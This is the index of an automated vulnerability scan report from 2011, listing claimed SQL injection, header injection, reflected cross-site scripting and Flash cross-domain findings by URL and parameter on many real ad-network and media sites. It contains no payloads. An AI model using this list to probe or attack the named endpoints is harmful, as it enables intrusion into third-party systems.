XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, 051302011-01

Report generated by XSS.CX at Mon Jun 13 08:12:03 CDT 2011.

1. SQL injection

1.1. http://as.jivox.com/player/iabplayer.php [siteId parameter]

1.2. http://l.yimg.com/j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css [REST URL parameter 2]

1.3. http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js [REST URL parameter 2]

1.4. http://sports.yahoo.com/nba/news [REST URL parameter 1]

1.5. http://sports.yahoo.com/nba/news [REST URL parameter 2]

1.6. http://www.lijit.com/beacon [informer parameter]

1.7. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship [Referer HTTP header]

1.8. http://www.twackle.com/fansided/General_Twackle_Widget [REST URL parameter 1]

2. File path traversal

3. HTTP header injection

3.1. http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [name of an arbitrarily supplied request parameter]

3.2. http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [tile parameter]

3.3. http://ad.doubleclick.net/pfadx/fansided_cim/ [name of an arbitrarily supplied request parameter]

3.4. http://ad.doubleclick.net/pfadx/fansided_cim/ [secure parameter]

3.5. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php [ES cookie]

3.6. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2]

3.7. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]

3.8. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]

3.9. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

4. Cross-site scripting (reflected)

4.1. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 2]

4.2. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 3]

4.3. http://a.collective-media.net/adj/cm.mtv/ent_010111 [name of an arbitrarily supplied request parameter]

4.4. http://a.collective-media.net/adj/cm.mtv/ent_010111 [sz parameter]

4.5. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [adurl parameter]

4.6. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [ai parameter]

4.7. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [client parameter]

4.8. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [num parameter]

4.9. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sig parameter]

4.10. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sz parameter]

4.11. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [adurl parameter]

4.12. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [ai parameter]

4.13. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [client parameter]

4.14. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [num parameter]

4.15. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sig parameter]

4.16. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sz parameter]

4.17. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_a parameter]

4.18. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_d parameter]

4.19. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_eo parameter]

4.20. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_et parameter]

4.21. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_o parameter]

4.22. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pm parameter]

4.23. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pn parameter]

4.24. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_s parameter]

4.25. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [redirect parameter]

4.26. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [sz parameter]

4.27. http://ad.doubleclick.net/adj/cm.mtv/ent_010111 [net parameter]

4.28. http://ad.doubleclick.net/adj/gm.kotaku/e3 [name of an arbitrarily supplied request parameter]

4.29. http://ad.doubleclick.net/adj/gm.kotaku/e3 [ptile parameter]

4.30. http://ad.doubleclick.net/adj/gm.kotaku/pax [name of an arbitrarily supplied request parameter]

4.31. http://ad.doubleclick.net/adj/gm.kotaku/pax [ptile parameter]

4.32. http://ad.doubleclick.net/adj/gm.kotaku/pc [name of an arbitrarily supplied request parameter]

4.33. http://ad.doubleclick.net/adj/gm.kotaku/pc [ptile parameter]

4.34. http://ad.doubleclick.net/adj/oiq.rmx/ [click0 parameter]

4.35. http://ad.turn.com/server/pixel.htm [fpid parameter]

4.36. http://ad.turn.com/server/pixel.htm [sp parameter]

4.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [click parameter]

4.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [name of an arbitrarily supplied request parameter]

4.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131 [click parameter]

4.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [click parameter]

4.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [name of an arbitrarily supplied request parameter]

4.42. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.43. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.44. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]

4.45. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

4.46. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

4.47. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

4.48. http://admeld.adnxs.com/usersync [admeld_callback parameter]

4.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

4.50. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

4.51. http://adnxs.revsci.net/imp [Z parameter]

4.52. http://adnxs.revsci.net/imp [s parameter]

4.53. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

4.54. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.55. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.56. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

4.57. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.58. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

4.59. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]

4.60. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]

4.61. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

4.62. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

4.63. http://api.dimestore.com/viapi [id parameter]

4.64. http://api.mixpanel.com/track/ [callback parameter]

4.65. http://ar.voicefive.com/b/rc.pli [func parameter]

4.66. http://as.jivox.com/player/iabplayer.php [clickTagURL parameter]

4.67. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]

4.68. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]

4.69. http://as.jivox.com/player/jivox_ad_tags.php [adVideoURL parameter]

4.70. http://as.jivox.com/player/jivox_ad_tags.php [autoPlay parameter]

4.71. http://as.jivox.com/player/jivox_ad_tags.php [campaignId parameter]

4.72. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]

4.73. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]

4.74. http://as.jivox.com/player/jivox_ad_tags.php [iframeTag parameter]

4.75. http://as.jivox.com/player/jivox_ad_tags.php [jivoxBranded parameter]

4.76. http://as.jivox.com/player/jivox_ad_tags.php [maxAds parameter]

4.77. http://as.jivox.com/player/jivox_ad_tags.php [mouseAction parameter]

4.78. http://as.jivox.com/player/jivox_ad_tags.php [name of an arbitrarily supplied request parameter]

4.79. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]

4.80. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]

4.81. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]

4.82. http://as.jivox.com/player/jivox_ad_tags.php [pauseBetweenAds parameter]

4.83. http://as.jivox.com/player/jivox_ad_tags.php [r parameter]

4.84. http://as.jivox.com/player/jivox_ad_tags.php [reportingURL parameter]

4.85. http://as.jivox.com/player/jivox_ad_tags.php [restartOnUnmute parameter]

4.86. http://as.jivox.com/player/jivox_ad_tags.php [serverName parameter]

4.87. http://as.jivox.com/player/jivox_ad_tags.php [serverURL parameter]

4.88. http://as.jivox.com/player/jivox_ad_tags.php [siteId parameter]

4.89. http://as.jivox.com/player/jivox_ad_tags.php [t parameter]

4.90. http://as.jivox.com/player/jivox_ad_tags.php [volume parameter]

4.91. http://as.jivox.com/player/jivox_ad_tags.php [volumeInitAction parameter]

4.92. http://as.jivox.com/unit/jivox_unit_tags.php [campaignId parameter]

4.93. http://as.jivox.com/unit/jivox_unit_tags.php [creativeUnitType parameter]

4.94. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]

4.95. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]

4.96. http://as.jivox.com/unit/jivox_unit_tags.php [mouseAction parameter]

4.97. http://as.jivox.com/unit/jivox_unit_tags.php [name of an arbitrarily supplied request parameter]

4.98. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]

4.99. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]

4.100. http://as.jivox.com/unit/jivox_unit_tags.php [siteId parameter]

4.101. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.102. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.103. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.104. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.105. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.106. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.107. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.108. http://ct.buzzfeed.com/wd/UserWidget [or parameter]

4.109. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

4.110. http://d.chango.com/collector/admeldpixel [admeld_adprovider_id parameter]

4.111. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]

4.112. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]

4.113. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]

4.114. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]

4.115. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]

4.116. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]

4.117. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]

4.118. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]

4.119. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]

4.120. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]

4.121. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter]

4.122. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter]

4.123. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter]

4.124. http://digg.com/tools/diggthis.js [REST URL parameter 1]

4.125. http://digg.com/tools/diggthis.js [REST URL parameter 2]

4.126. http://event.adxpose.com/event.flow [uid parameter]

4.127. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 1]

4.128. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 2]

4.129. http://geo.gorillanation.com/geo.php [name of an arbitrarily supplied request parameter]

4.130. http://geo.gorillanation.com/geo.php [website_id parameter]

4.131. http://hollywoodcrush.mtv.com/favicon.ico [REST URL parameter 1]

4.132. http://ib.adnxs.com/ab [ccd parameter]

4.133. http://ib.adnxs.com/ptj [redir parameter]

4.134. http://idolator.com/ifb/audience-science.html [REST URL parameter 1]

4.135. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 1]

4.136. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 2]

4.137. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 3]

4.138. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 4]

4.139. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 5]

4.140. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 1]

4.141. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 2]

4.142. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 3]

4.143. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 4]

4.144. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 5]

4.145. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 1]

4.146. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 2]

4.147. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 3]

4.148. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 4]

4.149. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 5]

4.150. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 1]

4.151. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 2]

4.152. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 3]

4.153. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 4]

4.154. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]

4.155. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]

4.156. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]

4.157. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]

4.158. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]

4.159. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]

4.160. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]

4.161. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]

4.162. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 1]

4.163. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 2]

4.164. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 3]

4.165. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 4]

4.166. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 5]

4.167. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 1]

4.168. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 2]

4.169. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 3]

4.170. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 4]

4.171. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 5]

4.172. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 1]

4.173. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 2]

4.174. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 3]

4.175. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 4]

4.176. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 5]

4.177. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 1]

4.178. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 2]

4.179. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 3]

4.180. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 4]

4.181. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 5]

4.182. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 1]

4.183. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 2]

4.184. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 3]

4.185. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 4]

4.186. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 5]

4.187. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 6]

4.188. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 1]

4.189. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 2]

4.190. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 3]

4.191. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 4]

4.192. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 5]

4.193. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 6]

4.194. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 1]

4.195. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 2]

4.196. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 3]

4.197. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpck parameter]

4.198. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpck parameter]

4.199. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpjs parameter]

4.200. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpvc parameter]

4.201. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpvc parameter]

4.202. http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [mpck parameter]

4.203. http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [mpvc parameter]

4.204. http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [placementid parameter]

4.205. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpck parameter]

4.206. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpt parameter]

4.207. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpvc parameter]

4.208. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpck parameter]

4.209. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpt parameter]

4.210. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpvc parameter]

4.211. http://js.revsci.net/gateway/gw.js [csid parameter]

4.212. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [REST URL parameter 2]

4.213. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [sz parameter]

4.214. http://kotaku.com/static/ad_iframe.php [rand parameter]

4.215. http://kotaku.com/static/ad_iframe.php [script_url parameter]

4.216. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif [REST URL parameter 4]

4.217. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 1]

4.218. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 2]

4.219. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 3]

4.220. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 4]

4.221. http://moviesblog.mtv.com/favicon.ico [REST URL parameter 1]

4.222. http://ox-d.sbnation.com/w/1.0/ajs [o parameter]

4.223. http://pglb.buzzfed.com/63975/3848554c08824c2e6b4e5963f6d2d7e2 [callback parameter]

4.224. http://pglb.buzzfed.com/83240/6ff44b0268185d901ef2d93cd3d3a48f [callback parameter]

4.225. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

4.226. http://s26.sitemeter.com/js/counter.asp [site parameter]

4.227. http://s26.sitemeter.com/js/counter.js [site parameter]

4.228. http://s46.sitemeter.com/js/counter.js [site parameter]

4.229. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

4.230. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

4.231. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

4.232. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

4.233. http://thesouthern.com/app/port/bulkCommentCount.php [REST URL parameter 1]

4.234. http://thesouthern.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]

4.235. http://thesouthern.com/favicon.ico [REST URL parameter 1]

4.236. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 1]

4.237. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 2]

4.238. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 3]

4.239. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [name of an arbitrarily supplied request parameter]

4.240. http://tvfanatic.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.241. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]

4.242. http://um.simpli.fi/am_js.js [admeld_callback parameter]

4.243. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]

4.244. http://um.simpli.fi/am_match [admeld_callback parameter]

4.245. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]

4.246. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]

4.247. http://widgets.digg.com/buttons/count [url parameter]

4.248. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]

4.249. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]

4.250. http://www.lijit.com/delivery/fp [n parameter]

4.251. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

4.252. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

4.253. http://www.paperg.com/jsfb/embed.php [bid parameter]

4.254. http://www.tvfanatic.com/favicon.ico [REST URL parameter 1]

4.255. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]

4.256. http://www24a.glam.com/appdir/getscript.jsp [view parameter]

4.257. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]

4.258. http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter]

4.259. http://adnxs.revsci.net/imp [Referer HTTP header]

4.260. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

4.261. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]

4.262. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

4.263. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.264. http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie]

4.265. http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie]

4.266. http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie]

4.267. http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie]

4.268. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

4.269. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

4.270. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

4.271. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]

4.272. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

4.273. http://d.chango.com/collector/admeldpixel [_t cookie]

4.274. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [ZEDOIDA cookie]

4.275. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [ZEDOIDA cookie]

4.276. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [cli cookie]

4.277. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [cli cookie]

4.278. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js [ruid cookie]

4.279. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js [ruid cookie]

4.280. http://s26.sitemeter.com/js/counter.asp [IP cookie]

4.281. http://s26.sitemeter.com/js/counter.js [IP cookie]

4.282. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [ctags cookie]

4.283. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]

4.284. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [qcsegs cookie]

4.285. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]

5. Flash cross-domain policy

5.1. http://altfarm.mediaplex.com/crossdomain.xml

5.2. http://d.xp1.ru4.com/crossdomain.xml

5.3. http://dg.specificclick.net/crossdomain.xml

5.4. http://load.exelator.com/crossdomain.xml

5.5. http://m.xp1.ru4.com/crossdomain.xml

5.6. http://matrix.hbo.com/crossdomain.xml

5.7. http://pix04.revsci.net/crossdomain.xml

5.8. http://secure-us.imrworldwide.com/crossdomain.xml

5.9. http://segment-pixel.invitemedia.com/crossdomain.xml

